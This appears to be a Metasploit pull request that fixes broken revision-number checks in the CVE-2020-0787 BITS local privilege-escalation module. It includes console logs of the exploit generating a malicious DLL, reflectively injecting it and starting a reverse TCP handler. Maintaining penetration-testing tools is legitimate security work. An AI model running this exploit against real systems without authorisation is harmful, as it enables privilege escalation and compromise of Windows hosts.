### PR TITLE
windows/local/cve_2020_0787_bits_arbitrary_file_move (and similar) fails due to incorrect revision_number checks

### DIFF
--- a/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
+++ b/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
@@ -102,23 +102,23 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
-    if version.build_number == Msf::WindowsVersion::Win10_1909 && version.build_number.revision_number.between?(0, 718)
+    if version.build_number == Msf::WindowsVersion::Win10_1909 && version.revision_number.between?(0, 718)
       return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1903 && version.build_number.revision_number.between?(0, 718)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1903 && version.revision_number.between?(0, 718)
       return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.build_number.revision_number.between?(0, 1097)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.revision_number.between?(0, 1097)
       return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1803 && version.build_number.revision_number.between?(0, 1364)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1803 && version.revision_number.between?(0, 1364)
       return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1709 && version.build_number.revision_number.between?(0, 1746)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1709 && version.revision_number.between?(0, 1746)
       return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1703 && version.build_number.revision_number.between?(0, 2312)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1703 && version.revision_number.between?(0, 2312)
       return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.build_number.revision_number.between?(0, 3563)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.revision_number.between?(0, 3563)
       return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
     elsif version.build_number == Msf::WindowsVersion::Win10_1511
       return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
-    elsif version.build_number == Msf::WindowsVersion::Win10_1507 && version.build_number.revision_number.between?(0, 18518)
+    elsif version.build_number == Msf::WindowsVersion::Win10_1507 && version.revision_number.between?(0, 18518)
       return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
     elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2
       target_not_presently_supported


### PR DESCRIPTION
Fixes #18797

## Verification
Before the patch:
```
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit

[-] Handler failed to bind to 10.148.0.3:40018:-  -
[*] Started reverse TCP handler on 0.0.0.0:40018
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: NoMethodError undefined method `revision_number' for #<Rex::Version "10.0.17763.0">
[*] Exploit completed, but no session was created.
```

After the patch:
```
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit
[-] Handler failed to bind to 10.148.0.3:40018:-  -
[*] Started reverse TCP handler on 0.0.0.0:40018
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version! ForceExploit is enabled, proceeding with exploitation.
[*] Step #1: Checking target environment...
[*] Step #2: Generating the malicious DLL...
[*] Payload DLL is 94208 bytes long
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Launching netsh to host the DLL...
[-] Operation failed. Trying to inject into the current process...
[*] Reflectively injecting the DLL into 7132...
[*] Sleeping for 20 seconds to allow the exploit to run...
[*] Starting the interactive scan job...
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] exploit: Interrupted
```